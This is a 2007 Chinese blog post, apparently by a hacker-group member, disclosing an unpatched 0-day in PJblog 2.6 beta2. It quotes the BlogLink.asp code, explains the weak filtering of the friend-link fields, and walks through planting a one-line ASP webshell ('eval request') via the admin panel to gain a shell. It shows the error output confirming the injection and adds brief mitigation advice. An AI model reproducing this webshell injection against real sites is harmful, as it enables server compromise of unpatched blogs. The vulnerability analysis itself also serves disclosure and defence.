数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



PJblog2.6 beta2 Exploit
樱木花盗 发表于 2007-5-7 2:48:39
-----------------------------------------PJBLOG2.6 Exploit---------------------------------------------------------

这次PJBLOG2.6 Exploit 0-DAY出现在这段代码里面, 巧在我分析了下,确实是可以利用,就拿自己BLOG测试了下,之前看了篇关于PJ上传

漏洞确实是可以用的,不过需要反复备份数据库,还原数据库来拿SHELL,确实比较头疼!之前出现的跨站漏洞,我测试了下,确实可以,

但是貌似用途不是很大, 这次漏洞出在友情连接这里,BlogLink.asp,我们来简单分析下,之前有人说过,PJ的漏洞还有注射,但是这个对我们

拿SHELL没什么方便的地方!

<%
         if request.form("action")="postLink" then
	           dim link_Name,link_URL,link_Image,linkCount,linkDB
	           link_Name=checkURL(checkstr(request.form("link_Name")))
	           link_URL=checkURL(checkstr(request.form("link_URL")))
	           link_Image=checkURL(checkstr(request.form("link_Image")))
	           if len(link_Name)<1 then 

他这里只做了简单的过滤,并没有把一句话木马全部过滤掉,我们可以构造出

1:link_Name=checkURL(checkstr(request.form("link_Name")))

link_Name:这里当然是你的网站名称了,也是可以插一句马的地方,直接提交到数据中去,貌似他也没有完全过滤特殊字符,所以是可以直接

传马的,当然了,前提之下你必须要搞管理员帐号,才有可能拿SHELL,否则一切都是幻想而已,PJ跟了这么长时间,巧在终于找到一个可以利用的地方

2:漏洞出现的地方!

showmsg "友情链接发表出错","<b>网站名称不能为空!</b><br/><a href=""javascript:history.go(-1);"">返回</a>","ErrorIcon",""
	           end if
	           if len(link_URL)<1 then 
		             showmsg "友情链接发表出错","<b>网站地址不能为空!</b><br/><a href=""javascript:history.go(-1);"">返回</a>","ErrorIcon",""
	           end if
	           linkCount=int(conn.execute("select count(*) from blog_links")(0))
		           Set linkDB=Server.CreateObject("ADODB.RecordSet")
				   linkDB.Open "blog_links",Conn,1,2
				   linkDB.addNew
				   linkDB("link_Name")=link_Name
				   linkDB("link_URL")=link_URL
				   linkDB("link_Image")=link_Image
				   linkDB("link_Order")=linkCount
				   linkDB("link_IsShow")=false
				   linkDB.update
				   linkDB.close
				   set linkDB=nothing



他对了URL进行了简单的判断,然后直接select count(*) from blog_links,查询links表,将数据提交到里面,这里根本没有做任何过滤,大家

肯定会想到批量拿传奇2SF的方法了,哎,作者可能为了省事,只做了简单的验证,也没过滤相关字符,这个漏洞看似比较简单,但是拿SHELL还有一

定难度,首先你要搞定管理员user和PSWD,大家可以去默认的管理,也许有几只漏网之鱼,下面我说下利用方法.进入后台,然后在后台里面有个

友情连接添加的地方,将一句话小马插到里面,然后我们在前台打开更多连接,看到啦,有段熟悉的身影告诉了我们什么?

Microsoft VBScript ????? ?? '800a03ea' 

????? 

/swordsman/post/link.html??А 6 

eval request(&#34;cnnsc&#34;)
-------------^

快来你的一句话来连接吧,呵呵!图我就不贴,因为是自己BLOG,呵呵!

下面,我讲修复方法,其实方法,在简单不过了,关闭注册,因为注册会员貌似也有这个权限。

保管好自己的超级管理员帐号!好了今天就到这了,大家不要搞什么破坏,官方暂时还未出补丁!
-------------------------------------------------------------------BY:Sworsdsman  维护祖国网络安全,憎恨日本帝国主义!
                                                                   blog:http://www.hackerexp.cn/

                                                               中国黑鹰联盟  

                                                               www.cbhu.org










阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.